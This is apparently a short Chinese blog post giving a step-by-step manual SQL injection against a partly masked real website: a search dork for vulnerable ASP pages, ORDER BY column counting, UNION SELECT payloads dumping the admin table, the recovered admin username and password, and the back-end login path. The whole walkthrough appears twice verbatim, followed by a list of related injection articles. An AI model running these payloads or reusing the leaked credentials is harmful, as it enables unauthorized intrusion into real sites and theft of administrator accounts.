SQL手工注入
2014-05-21 22:13
302 查看
site:xx.cn inurl:asp?id= //找文章
xx.cn/pth/onews.asp?id=243' //试注入
xx.cn/pth/onews.asp?id=243 order by 10
xx.cn/pth/onews.asp?id=243 order by 20 //order by 语句用于根据指定的列(字段)对结果集进行排序,这里是在爆字段长度
爆出字段长度为11
联合查询
xx.cn/pth/onews.asp?id=243 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
或者
xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
爆出2&&3,用字段(admin表中的admin字段与password字段)替换掉2&&3
xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
爆出账号与密码:
账号:admin
密码:bfpms
找到后台:xx.cn/pth/admin/adminlogin.asp
登陆即可
xx.cn/pth/onews.asp?id=243' //试注入
xx.cn/pth/onews.asp?id=243 order by 10
xx.cn/pth/onews.asp?id=243 order by 20 //order by 语句用于根据指定的列(字段)对结果集进行排序,这里是在爆字段长度
爆出字段长度为11
联合查询
xx.cn/pth/onews.asp?id=243 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
或者
xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
爆出2&&3,用字段(admin表中的admin字段与password字段)替换掉2&&3
xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
爆出账号与密码:
账号:admin
密码:bfpms
找到后台:xx.cn/pth/admin/adminlogin.asp
登陆即可
相关文章推荐
- sql注入之手工注入示例详解
- 手工MSSQL注入常用SQL语句
- 手工MSSQL注入常用SQL语句
- 浅谈分析普通sql手工注入
- 我的学习笔记(SQL简单的注入)(1) 手工注入以及注入一些常用语句
- SQL 手工注入大全
- SQL手工注入基础详解----MSSQL篇
- 手工MSSQL注入常用SQL语句
- 手工注入常用SQL语句
- sql注入之手工注入示例详解
- sql手工注入
- SQL手工注入语句
- SQL手工注入大全
- SQL手工注入的学习总结
- 总结SQL手工注入方法
- PHP+MySQL环境下的SQL手工注入教程
- sql工具和手工注入总结
- 手工MSSQL注入常用SQL语句
- SQL手工注入
- SQL手工注入基础详解---- postgresql篇